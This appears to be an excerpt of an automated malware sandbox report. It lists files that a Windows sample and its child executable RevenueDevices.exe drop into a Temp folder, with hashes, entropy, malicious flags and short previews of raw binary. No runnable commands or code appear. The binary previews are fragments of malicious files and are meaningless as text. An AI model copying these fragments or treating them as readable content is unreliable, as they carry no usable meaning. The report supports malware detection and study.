                                    Preview:.(..D.S.6%T.S..HO.....'T.;........o..M:...W.F..g.=.d5....f4.Z.....`uu.+.Q.+:5.?....M.K...2).Ts.P.....WHaU......D....^@`.#F...7.\..I....P<..H..t.C./....%Z...Q...,fc.....M....;..%{...Dew....._.*.a..N%.i.......j...<.#L..C'@..sp.cjo.}.o?a....../<..F..vOin5.o..R...)..Y.vz./.E..(..)...5.@u..P..|.3v..O.E..W..I..Q.....E.Ap..... |..sQc........x...;e..&_.s...=..#.Tl...U...z....%..$o.!v'....Y....as.a.._.4....a.p.*........|.R...eM9..4F.Dh.a.`.....E.die8W{..Y..~[......Ke,..(.P1x^.kFj....:..._.k......v...8..g.Z.......U.QZ.O.i...A..d.)...v.P..}l4>W..u..F$@..2.3..b.!...m.P.F.K:..weH....}..`...?.HKn.g.LOtC.<V.3o.{.>..G......:,.enD..N..G......n....\%....OL.q..iA...z..*...jy...bj.P.q...f.sA#.R,oH....B.g2`.$=../..)C....I.*..5...6.i..-....L..Z..2.;I/..co.L...z.....ZGG83....S+.2(dY1.X.....W..t...URC...:....._.|0;....."......T6.u!.x..9..Y(....l.x..........o....j&....-{J.B....$.VU.K.F.ZG.p..S.......-B^nq.P.z...K,.....2c...Sp..n.....w...16...c............`>..

                                    C:\Users\user\AppData\Local\Temp\Chairman

                                    Download File
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):74752
                                    Entropy (8bit):7.997056709124233
                                    Encrypted:true
                                    SSDEEP:1536:MYE75r5qsUBZvfbk57uYxccDzpoiAMEFVTPYOw:gz8ZCPPkFVTY7
                                    MD5:F680B71A7E50BC5F4D947FE5F13D87AC
                                    SHA1:3220576AF77B5C996A46CE521E9F76F62959FCB1
                                    SHA-256:57B03B58A4B83D254447D35154B005336BC097D1EFC4F62075BF32236C098176
                                    SHA-512:EACFF158C63F85D33235DC8537720B46976EE556E94316F7B4486E88BFEF66C02C68450EC0405EAAC8E37A534207161ACE06642A6453580D79E235DD9EA46E95
                                    Malicious:true
                                    Preview:.;....w~../...+.T..I0.3..p...}.. ...U<...Sp...j...o.9.c..X...n.:..Y[E.mO.....X.......#..0L....\FXXY.ZB.....l.?...7....;.>|\h.-.I...#.......;h...O$.=``~..d....f-A........[......96..=8...`s."W..G...]..,....dA..2[.n..v..>.3..X......yj.0.}!.0.E..........E..p.G1%.[...../;It..$....V.....U..s..........j.\.4N.4.....).&J.x."..^~.x.[.hD.^..rE.t.c.....}.l...xi.....7.._K.......<1.....z...6n........>.yz$.^.b3M....b...YIY.y.....*$.@......v...ST....}..p.d...de.TI..bF.).s.6U=.~...c\..e!,.....}N..'.......]..2u.C....<.:.*.=..0~W.R...4*.x"r.i;.9......G........t............-.K..] ..!.g..c..:..s.REXQQ..._..O...-....5$2J.K.....9K.....h.b..u...-....G..C..`$....$.k...o.......R'.G.4CSe.."}...[...dE.!.D.U$.P..O....*I\"|F...B?..4....w......3...=iU..Drj..?....(. :;....W.t.....m..F.q.(.{.B..........# %5i..... XC$...X..G...6s.....F.......znxc.7B|.....v.>H(.<.......X..P.2M.[s~..nI.t0K..U....3..=Ha..8.D..K..uI.|&.....=9>Mn<+&..z..K"..S...c.f...T..D... J...p.

                                    C:\Users\user\AppData\Local\Temp\Considerations

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):68608
                                    Entropy (8bit):7.997498339758161
                                    Encrypted:true
                                    SSDEEP:1536:AypewPLnlLj8Gd5KdggE+wOg+Cs30qsLkGA9FsJ:3tPLlLjb5yghOg+CUEYGAY
                                    MD5:FCC2E848DA8D0BEAC27BA027AE23DC2A
                                    SHA1:D4FAE227CC35C806B7E06D85581FE7540EC4A9CA
                                    SHA-256:B2381BFDDBBB5016607B0A66DF94ADC1B4552D6BB65682D492863C4E12A67E9B
                                    SHA-512:8C80DEF9F4B0C7F37AED52E7C2BC7602DC354CFEFB0CA3E33704B07BECB1AD3FE4828BF2F5C82AD000161DBC052E584105F305D67C1DF5079D6E95B79E4F768F
                                    Malicious:true
                                    Preview:..4O.t...w..f.H:.Ln...<}.F'.(..]Xw%z...e.I^.....)!"..os.....Z.c..e...t...pRn@.^.Y......L$.}...E....=....y.. .....R...z.s@...an...K> .2f9..........[......B%j&.^.b{....).#0!.G2..V.,.i.A..\...o.V..d..sLs...w....?.r.Lr....j..2...V.*L......./..@a..<...(..[............t.....$u.....I)IR......<'./....._q@...o..b/..A......mE.J.7...^..8H.S'...W......Lo.=F{.....;E...,&5[3..Y........_.......Q.....zQ.....oxX"..\....ws......$>....b.n.Y..U..>h..2r.Liw.w...a.CHy^.}..t?.^...&t.J.2.ML.("...~...:..,b._.....zs...G.]/..&).......K$J|h...o.....<c.M......T`f..TC6d4.X..q/Tv.X.u%...&.gl.h....gCb.i..].LA....j}..4.g....99.QS..4..v..$U......po\@......<R..n..\g..u\X&.'Z...wk.TY...&.....U..F....H9..zI../.u....2.G..MT).wH.0.......`...j_...s6[.z#LE.l?..P..;T.!B...#...$..T.%.i.j.\.L<..>...>~q........<!.+Q6.5.{....{.s..........^.....9K.KL0.+L.j.RFK.,..ym..zD4.?.o.s...r....-}.W..3.|..D...{.8..B........#Q...i}.;Z~.........F..+U..c..};U..1.v.1..t..<.\H........sz....=..

                                    C:\Users\user\AppData\Local\Temp\Credits

                                    Download File
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6763
                                    Entropy (8bit):6.181007381204778
                                    Encrypted:false
                                    SSDEEP:192:9LHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jM5:9LHAHhww+/2nlP3r1WK
                                    MD5:7EDEB773E5981A722C32E62A44B557AA
                                    SHA1:8F215AEB386FA05B62509AF79FF886430913DE9A
                                    SHA-256:E36F5C7223E21AA3F6B2D2C3EE1C236BD7A568ED8804A3FE908D37A065A52BD3
                                    SHA-512:3C0DDA7920B3468FA1D7405A9A6E84C17940E91C1A93E0726F5DDF3C1F8FCC3B0706F517CE2CE7755942687FADBB28F506DA7C7BFBD9E742C2C9A06F8F47F804
                                    Malicious:false
                                    Preview:SyntaxMilesImperialTriple..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.....................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\Disco

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):924590
                                    Entropy (8bit):6.626218475261086
                                    Encrypted:false
                                    SSDEEP:24576:9Js7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:9C7hGOSPT/PxebaiO
                                    MD5:5E0A36A6A1E6CEB0BD42ED9DEBDE8666
                                    SHA1:6F0E0881B517206EAEF33364CA40B006038B5FE2
                                    SHA-256:1FBE941B779B8EE4152E224FE6856364B5B67BB7ECEF9F81EDE5DD7441165A3B
                                    SHA-512:7946F6A25406A15D83BD6BE6D0FA542A9D0B6C01515362FE8E318D5FCE5FC792C08AA163042DEAF2DE88EA79431175FB14C503288C12DAF6A971A9A8DDC9C80D
                                    Malicious:false
                                    Preview:A.G.....U..QQV..i......d...uS.p..7....M..E.....Q.M.QP...d....x$.}....`...t...i......d...u..I..E.A..^......j....@0.I0..U..SV.u.3.W....y.Q.>.......t....%M..@...f9X.u..8!t....t._^3.[].......U....3.BSVW..P.P..U................J....%M..O..1f.~..u.6.. t...+u..+...3...+.............f.y.4............A....E.A..E..A...R.U.E.....h...X%M..)6......M....G.3..+....D..f.x.GuB.A..E..E.SP.E.P.E.PW.}.......(....M......U..%....X%M.....3._^[..jiX.....U...<SV.M..M.W.(....}.3..E........7N.u..u.3...R.B...._.....t&..u".@...f9p.u......tB...u..u6..U...M..E.P..`....F....E..M.@....}...M...}.._^[....I.A.U..E.;..3M.....~.......3M.]...3...U..W........Q...Vj8.f...Y.u...........O..N0.w.^.._]...U..V.u.W.......O..F..G..F..G..F..G..F..a..P.M....F .O .a..P.=....._^]...3.3.@.Q..A..Q..A,...Q .Q(.U..W......uCVj(....Y.....^6...u....0.......5...v..6....I..f$..G...t..p$.w..G.^_]....7..U..VW.}...;.t.W.B6...G..F..G..F..G..F..G..F..G .F .._^]...SW..._...t.V.3.s..w...j.S.(.........u.^.OL3..t..A.9.tD..j

                                    C:\Users\user\AppData\Local\Temp\During

                                    Download File
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82944
                                    Entropy (8bit):7.99782535181456
                                    Encrypted:true
                                    SSDEEP:1536:uUvnsq3c06LY1+ON5BCB3RcoDlnODJEE2VmktaqwktgrvT+zNkAX8HLAqe8BQ:/40q+DdsSknNLVFdpyrvTUkq8rNG
                                    MD5:46314326121D86FFC7D31F86B127EA68
                                    SHA1:A1B102103D81403B08E3F5D2B08C6F4B61761F4C
                                    SHA-256:F88402A04478329C5A7626ACDAA5B247EF7B6352C9D3C0F8C3BC806892797098
                                    SHA-512:96C4889BEC20D3B98096CE6DF50A53EE9B3C6AEB258495DE21B6F32BD96CB227082062CF4CFFA3587A05743423205F85E472C60A6F640E388FD829AD4E3E6D5D
                                    Malicious:true
                                    Preview:.?.J.ptEd.{.Bt3t.'#..!.s...4...5C...c+.Y8..I...9=.m......U^.....i|.....t......Y.......*..........<....$.mS....}.c.n.V..q..X..q....c^Z..b}..,.N-!...I.S...e.oz.0...G.....3F.....7...O.#..^..7..?j...v.'y.!+oW.D.n.......o.j...b.1.h....4.,qVK.....q...}PB..f.....IB..7.D..v.m2......W..VUG.:Ad.u.D.<...X".k....d.F..)..?..L.1.E.........s.a1u..z:....w/...">_.:.mK0.7@_....j...^b....q../V..jD..|..........$..vfLv.Q..4...f7.xt..._...b..4.E-5..u;AN..|._...L.=....o-........].H........@\.....l@......d..@.B.%jF:.M..am..O.%G..=i.|32...nG.j.<#.D..HW.<......Q..6.eXu.E..g...^sx=.A.F%..x.%..c...x?.......t. ..........'........x....P.J.Z...5....'..).C.*..C..[....8.P......qg~.PR.>.#.......0..,...'..d....cy4#'.1<..>.9Xk..s.G....;t.a..PW>..mu...X..).L.i)O.b.vt..}.a....s.1Z....8.q..&...h]..M...g..z./.....$.O....-..q..........:.....[Q..f...p.......d....b."84..4..`.4...q....86.G.r..zu...u"'\..^..U.Z.!..L..\;-.:#...e.G`U.U..A.....4..~...._Ow......W....yL....E...../.i.

                                    C:\Users\user\AppData\Local\Temp\Eight

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):51200
                                    Entropy (8bit):7.9964112257752635
                                    Encrypted:true
                                    SSDEEP:768:BWVzlyOAYnoKD3B2049QknUNLB5f3Bc1nlHjbng01S/plADTTaQm695eVUjX:cAYnjDxTlc1lHnMDADTTagGs
                                    MD5:7C7B509C91FD9DA8DDFA9C3B5991C9EB
                                    SHA1:61FB5CF74F58BDE99C00A010E1A670BEB85FD8AD
                                    SHA-256:C6E57103AF0A2B2ACA227A2B8683B6298711454A84EF57DC91FD35D279DE9D64
                                    SHA-512:E56D32471A3C0B409A1B5A35065DB89ACE5F01928E915AB49A21242F74010C099F91F55272714F5F24C06824E5BBD0C4349DE5BFDC6E385030DEFE0D726CD06A
                                    Malicious:true
                                    Preview:op"...1..h.r...n7R.\$H.../.....g`n.-..F..$..........p,......].O....l.(E.t...r..e?$j.2>k...38.a..scG........x.......|-..0...,....2..@..W}.lj.1g...(m..iWh.#...5..0.G..&.0J.xu.+.T..._=.....".....\L.. p.u.~W.f.76..h*.......[i......u.!..e.Y..lD..D..U.....;n...k...a..nnKs...h.T..(..9.e|..C.....b4H.PM...ZE....._......I..~w?...M.......g?f.1.k...v..z..1uRm..K..x.`..C.;.i;........q_.ZQiP...\r........j.......~2P...O..<...7....vC.m=hL..B.8.l..o....|...l!..=I.[.c.q5....>...N6;.>..`h....W..p.b+.Z...]i....w.Zq....|.L.b..a.XB=.;.{.....RUw..|.4.M2..ST);...H..ke:..p...e.u.g..R...wW^b.,x...>.h...h...{Y ;..=...n.......M....(..]fJ.f._...q.X..E...D....I8d.P;^..%I...q0..4.?..E.z....<.5$.../.n.}.....L.B.}l./.x..[....8.....p"l.......P.....qDh.OY...n..R....~.x7...g..c.Lz...Y.%...5...YV<....}Y....7[.n....1..Z..........Z.:..]....8s...U..b0......K..:.....u.e..g..^.;C .D..j..O.Q,zLL"....:#...D6<.@r..*.S.....J.&..{M.c..={...#....#{:=4.}......yR.D...D&..}Wg.

                                    C:\Users\user\AppData\Local\Temp\Label

                                    Download File
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):99328
                                    Entropy (8bit):7.998320064959559
                                    Encrypted:true
                                    SSDEEP:3072:tSSpU6SiAA4NS4Hn/MnR6fwz3zyXAPzwTMi5MNLX/:tfhAJHnEnRdz3zyXAUMNNLv
                                    MD5:3DF0D5DE7053FB2549302A0179A1BF61
                                    SHA1:FF703D20952AF8746DFB6BEE91A4D1087FD00178
                                    SHA-256:44AD7D019A43BBF79153340DA5E71F688E3C03D3E5D46182E43700F5A4DD7969
                                    SHA-512:BF8FEDD43BA4C6C7E1FE3384140C48CBFEBB94D4C8C4FDC9684CB5AEAD0753372031F1BDCCCF01080EFA8C3DC549E6C273BF07F263496558414DB4432DFB639F
                                    Malicious:true
                                    Preview:..M. ]....D.."1.....0..5...j.o|....`..%m.U.&.|\.....P=...i..I...*k.....!....A.8.\..6....E..W.......,..z...}......,j....B.A..5.s(j|...H......r../..2V.....e..ZO"...y..3...`.@.I.A$.%.7.../z.\7.}..'^..`..$.....W..*.j...45..+.3.....Y..LI.d%.H..U.N...?...~..?^.Vvo...WB.KW..kO.?....'.5.j...Y..lgH.....R.-u={>.ON.c..g..cb....v.....>+..a:I-.Lf7.......M...w.6.ml.Eo+S-7..H..F?q*..c..!....=v.+M...4.T..#..g.\..."G(..T........../ad.A .5I.h..s..n(.g..j.......s...L.5........z.GN.G...F.C....N.d7.+'....f"|.hw..4...&..6RxBv..v/....<...N..*+.%U......E......w.NX.q]...../p..&..V.....I#>....u.+....!..9.+..E...o.4.....G..U`,m.m.X..[..p..XF.$+.y?. f.\.N.r\Z...@@4.;.E.;~.}..5R_>...F.K.*W...z.....z..]s 7.2.....R..T7m..K.... u.........O..<.\e.+q.7.>K..4...r.U9......oJ.{L...*..\..4.G......!..Tz..y..../..7<.n.>.!.Z,...tY.i'.....2.B3.|6....#Li.eU}..w....!.....c..&....X..ov...)66"z..?~.F+X!.......Q..............7.y6/....5.:..g.VG..-.....%Y"!|g....q.I.R.U.~.0.M..51...~.....I

                                    C:\Users\user\AppData\Local\Temp\Leaving

                                    Download File
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):90112
                                    Entropy (8bit):7.998043435850004
                                    Encrypted:true
                                    SSDEEP:1536:BkspQryWj2DB86kbeQQ5DD955kxqAkyX/q3gwCupc3/xILWmIeFTjlApoGpWPO:SpyWc2TC/9D9fkxqAky/qwJ3jWJq5T
                                    MD5:70F463CB11CAF1C1982FD2699516C417
                                    SHA1:09DCCD4A57687724766E9F989F5965CA46B3EA2F
                                    SHA-256:18EE6AF15A8D07472934ED7B98773BAAEEDAF0A9F3D36B4D5392DC3D1D41F52B
                                    SHA-512:948D29CF7EC91B5A571E273801035310B9E289DEA2A87CB83571A73A2E2C0207171FBF6CE7CECB4639F229EABB98290C10E16EF08DD2E795E3A5B6C56C638371
                                    Malicious:true
                                    Preview:.b..c.h...,.d#g.........$'....o..%.+".9.Nu.......D...y#(.L..^..i.P_..c.c>8............B..y...7..x.@.._...m.S...C...9...9+._...G.R:.6q.;2X.:. ./....*8`.41.n..o..'............$.-.....Y..[^uL..1.w.........I.M.l...A.(.*..|..H.~...A..o.u>1u.S....tS3.2y..B.5.a.]..%.#t......R$7.*$_..5..[._y...........t..Z.......~...L..GG..P.....}.4FV...r.B_.g....E..>.(V.............j....K.X~...;.4...vy.A...l.....!...~~k..VT.6"B.{p.[._!H.=...U...*.....t..........[..1.x.5t...Y&...L..;.oX.t.V.^Ch..M._Z..mZ..oBn-..~...v.|.b........@..5d.|..Z6....P.. .....{j.,...."8..1.'.. .m!NW .a.....W...Q'xn.'.....6..f....$..*3.E.w.<.y@3.PQ[....{.c.[.F..0l&..c:..f.Xg.O.jOB?.n.i..CZ.,&%F..#.D.`.nXx'.d.bI...U...`n.m...l.?.....ALQQ.[....."./`.....F... .#.qu...x..m......r...u..;..>..F..22+.l..._..[...d.H}.........&...^..5....!7.W.2....:..g.....0}....j'..........q.gw...]Ns.Dx...*KE.v.sR...1..5....}@..D..-. .."..M........iH.x*.b...0C.7 u..$DvEf.J{+.SDp.oi..P*.=.....D.9..G.......

                                    C:\Users\user\AppData\Local\Temp\Million

                                    Download File
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):886872
                                    Entropy (8bit):6.622149769980728
                                    Encrypted:false
                                    SSDEEP:12288:iV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:gxz1JMyyzlohMf1tN70aw8501
                                    MD5:8830E269348EC39F4E379A7FAFFAB6BB
                                    SHA1:2382443521713A512B44178BB720DE79002FD759
                                    SHA-256:6137C618795F4FF75828534F776CC2F979126CF58DDFC8E4BD8D0C57E99365A8
                                    SHA-512:C1844C8ABB43D5991BBE56E026FE493D1D8AECB3559ECCF0E8D0CED51A0A6242EB1D611A744BED5592BA0EA6C6690D073BF7ADFD79B47252DF5ECFC9502137D9
                                    Malicious:false
                                    Preview:j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.|.....a....}..t...|...;............}..t......._^[..]....}....t.....x...|......U...M.VW...........|P;......H.Bt.......t<.u..@....M.....B`....8.t".....|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...w

                                    C:\Users\user\AppData\Local\Temp\Norman

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):83968
                                    Entropy (8bit):7.99777953585341
                                    Encrypted:true
                                    SSDEEP:1536:0hrgsLjJ2daNKUtnGZUs1bMOLBCSzfMA0x6S3gWlETHnJHL:0x3LjFKUtnyUsVFBFzD0xXgWSJHL
                                    MD5:AC10591ABC6E8218601573329D394545
                                    SHA1:7AD13438209AB213DABCC5274425A75C8BB63B27
                                    SHA-256:E720BCD9B3FB4CD02E1F7C16CCDBF9017E1231F390976C9BC6592E3E878F630A
                                    SHA-512:34FC9287C42FE1626DD1150E49D172166C4B9E47287BB2D56994AC5B1F237E938CB332F3E0B0C94408E2473AAF6B29F8E7731DE9FBD9D636320FB7238A6B2A4D
                                    Malicious:true
                                    Preview:.....w..d|b\.M.IC...B<....O..>.[......4Ksq`...?...g.H.....'._&j..t>..%9....o..X......2]}.w(..n.K...=...o-E.y..e...^}..N..9M.w.*..yI...5.9|@#..n.&....59.&>..s...G2.....PDCA+3.@.8P....D....g...>%o....d.....4X.:f0S.....9..}~....y1N....(R.L..D.._O.m.......{.s7......m......H..r....4f..%.....e.....Um=c2..<3.T.D.>`.0...P...k.W<R|..JSc.3..a......+&..q+.c...+)z.........Q8...L1..o1.9....6.(..c|.=..I.K..9qQd.O.7...f....M.gIiVA..~.....tq..q.f. .7X...qC.YR.~...a..l..C........gFx1.wn_.*f.o.....`!...BT......;r.n.....`:B(..92)..4o@..6..{..:....Q.d...E.q.YA.oj.fy.1D...4.&...oO..<..l@. "....[`..?..dv.......i..i2..a...6#..<.d.4.40p.+j....8J(.pz>..2U.2S.A.if.F<|.4z.].#.q.JS...C.N.......w...{.......~.#.o...F.&..g?z..||..wY..W..{L.m`T.......%..Slgzd.a2......TC..]...tf_.x.........|r.!....tFO..!...m........\.../.F...\.h..(....... .w..y...g..{.......t.......K.C...K.^.Pu...G.ce........[wS.$...#..mb.}..._....e..W...a9s.P...^i....v.......:J..5.....(..j.gC..9d:o...Yy.....

                                    C:\Users\user\AppData\Local\Temp\Parts

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82944
                                    Entropy (8bit):7.997454439778383
                                    Encrypted:true
                                    SSDEEP:1536:pNkbqY2FDb8R4MjFZwtLh5H5oeuPyXFvaqRhBT5z3QqVl/8W4zsZeQJ:pNk32FDgXEhZ5VzViwJ5zAqz/8WNcQJ
                                    MD5:D1DA7B87F186D2F06637FDB6851E4043
                                    SHA1:D84CD866C1F50D57FCA2A0000C9E5231229866D1
                                    SHA-256:B91FF890AF60C6AAD4BB50FB9ED5A8593A8ED0FF26568732A130BB4DA22BAF09
                                    SHA-512:697608D39B19C2B9A617102A74377A438BF1D53430DC09A225D98D59AB3A65B807E12F84D464F335190047624CDDB1452088B89FED15BB667C875FEAA8BED1F8
                                    Malicious:true
                                    Preview:.W.;...O...._....y...i..7/1...s...C...y.i..3....{{..Z..gky}%n......h.l...v.]#y*[6.7.....(........8.#G_q5.]+...%..G..#......d(.h)K).%.}...z..y...2.....^.x5R...`.6\......-.G?}R....d...q.q......p.0...=O...Pmt.7..HYHy).3..V..h.....u#.n9..W.....Z/F=i.KOHfb......f@..t..F........!K...Wjd.pQ..6w....B....9.E.u..#.e....2..^...:......=....c..w/..8..v.,~zv..TR.b......+...).C]...=.h.@.8.[.......>....te]...8...f0h(...6.hj=.+.vOh..e.{..5K.9...F..'a.Z0..z...!4.t..+....UG...|..0>.I'g..E%...k.(.Q...4A.()..o1Vx$...W..r..nL....G..<.G.......i./....j........Q..........].4B.8............Yp..+........dL+t-X.j....dO.&.#$.Q.lK...'Y.D...P.rK.............0....x8".QT.b....u..W..f.R.ZXV^c.7..G{...U..I(.<@..K.@..J.Ts.....(nU...0.p...]..>..e..p..B.I39.$...X.ODI..O.~;".J..Ck!...,.R...1.7..|$...v..I!...af.............^O5.82.Pe..^.>....6.i...3;...........?_....h.......Z..w...'..$y.%I.".9W.......gF.]...:........*=,|.N]..{l ... ...k.4K.=.f.q..&..:^K......n.p....B...OX.JAr.|.....

                                    C:\Users\user\AppData\Local\Temp\Perhaps

                                    Download File
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):26264
                                    Entropy (8bit):7.993020302135022
                                    Encrypted:true
                                    SSDEEP:768:v4ZuBgKUFIkJMQv0qUlx5r/pgkmbrpPHTTpMe+QiA:vouaKUFIBbqUn5berpPXpLd9
                                    MD5:DFE7ED86807FA94FAF01EEC261B0C875
                                    SHA1:BBD3A51945EA88C8FD4D70DD60B21A3258E5BE60
                                    SHA-256:C3D736E2745309C252E0A773A65F05B4AA9564C3246473888DF44126BD8A35D0
                                    SHA-512:01592287910E99128F329EBE309E1189EDEDEF61E5ADE26321C9177937BA7C8B8CDD033D868ED7E45435C1B761ABC250A19626967ED6007F275A421E7D7CFB39
                                    Malicious:true
                                    Preview:..l..;s>.&v..^U`...\8...8.+..*.....E.k2..._...2.I...:......'.,...$A....k......BR.Z.=.<OU...}..%....YWW..^O....R.P.ht%6..]!w.N.`y..F..-.m..fZ...,A._...........r.....s]..#....v...E....l...H..f...=.".?....uI...g.*.....y..].E"hm..d.......h.A{f!..!.@.........N.....c,W|..qJ....:....:..'....&\%..j..s...#Vw...XAK.....Oy.J.BMa.^.s...W.cF(...T...h/&.H./}.......'.u...>.|.~.....8W.-!,........+..T..-.......1.pNDF.I..\..}.....S..:.hA...b....S......k.#H/.3...e...5."..@.s.9.2....`...#6M.....o..5u..G..............X.L~.N.h!io.U.v.R.G.j......0'$......n4.Z!.3..&....`..#..?.......L../"..x.....e..G+.....r_..a.~.....'...S7.?g.CC....g..c....s>.....w.O.m...s4...Y....8..&....F[..)..........'.!..*.$..T.qe.3..:..8..g.R.=....".....Z?.l.a{.guz.....5..@^.......H.#.=Z..z.r..r8.=...z+....j>N~.......j..YT.l.s(......Xt......f.b.p..}*....c..a..^..V...y...&....=.h1...$:..%...*...#.G...)...)....lC..#...)b..1./......z!..D....l. .xL..,.~..-..V..8P...nDc..!.X1.Z2...

                                    C:\Users\user\AppData\Local\Temp\RevenueDevices.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1151988
                                    Entropy (8bit):7.977544256260055
                                    Encrypted:false
                                    SSDEEP:24576:jk8k+VnD9c/rJH6DguRRE0SBpQKkRS78imlEQ6dDyzKdKXnJX8cmegcEipn/:lkMnEa5dnZS78iokGRnJV7n/
                                    MD5:B487B5B51436B42576D60A1FE58F8399
                                    SHA1:4FF23FB37AABA96AC114FC54B397A902E4D9D650
                                    SHA-256:440FCA4D671E78345ED1763F7904174EFFDA3ECD567D7E20224E5910028B83C0
                                    SHA-512:DE6974616095ECDE0A222099D74FD08B307EB1213105053C14638A96FCB526C68FA53645D0B9359E1293B42AF45B01226AF7A373AC3A64709632C5D093C19EE5
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 58%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...V...B...8............@......................................@.................................4........@..r............s..h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc...r....@......................@..@.reloc..2............:..............@..B................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\Samples

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):88064
                                    Entropy (8bit):7.9980376794357575
                                    Encrypted:true
                                    SSDEEP:1536:Ad6ROLk6LJBOGir/67SrmGIQvugEx1Aa2RQkHTnwBPFe0nZevuy461Pln:+evWOGir/MSrIQvtra2J6PFe0ZB6Xn
                                    MD5:BACA9A04DD19F20199C21C2EBF0374AA
                                    SHA1:5DF76C54FD5F02DB7DF46FB38EF41449430545D0
                                    SHA-256:4325FAC47DF15F794B41742445329E5028C09B85F56696B1B590B0E8C5FDEC09
                                    SHA-512:39B10B8A6D9D55CACC30F8424E468F133EB599A29F1BE3CE20563DDDE0192FCDFAE891BEEE9F64FEF074A2D4113EEA7F14BDBBCD662398F36CD8B5CB037C5973
                                    Malicious:true
                                    Preview:..W..7.<...<*"...4..R.!I...Q.I.....A.@..W.Tsp.j.....Z..N.T...n...C/..{.......a....(.mb.+...N..d0.3kX.~..&..kk.4....A?[..\.z.....WZ5...I.+.8..rW*].Z...OQ:.5..d..VY.cR.i.:..3.......{.#.'.k.|.e..1..|.vX.t.U.;.k...Z.7-..*I....C.b.[XM...&.!....$'..?...*~vN...R.E.u..w/...Oe...iFS$....\...7.B..........%...p......TP.l..p.9.6|.r[.Q.~..o.j.k.....y......C.....[.c=>.=L{..N,....Ke.6}i...3.tV...1Z..ur..e.A.G*..@S73y.......V!v`Ex.c2....3.).....42gu.....#....&}vC/b...&...........T...T5U...1`..~1:..|...(D..]7.....t,..8...2H....A.\...2.....)-#.....b...tt.B..Ri...T.Zd..KI.I...........`}..I......G.+./.`y..!.e.....rJ.........fU[....].B..S.\O>{...O.c@..;k.O.9.9K..83.O...)A0R..........@r.U.R..*.#l....<.v`.....<N.8......kJ\..D.Z......)va3..Z-..WEH.u.~v{)aQ0c...p....[.Tl.Oi<n......BpQ.f.{`@...Q.)...BO...9..4..<x?..V...y.aR9..O.Y0...Rl...CM......{{v........n........EL..4xH....q....C.K......&~..J....4..:....4IO....X.....;!..C....n..Z.b..8.S....N(T

                                    C:\Users\user\AppData\Local\Temp\Seek

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:ASCII text, with very long lines (1312), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):27864
                                    Entropy (8bit):5.097783792840429
                                    Encrypted:false
                                    SSDEEP:768:GyoGt7cUtqnmJJbg0LJr+H6yqd1iODluLc2hAXQS1e4:zZtkmJJk+Jr+md8OBuLzGQge4
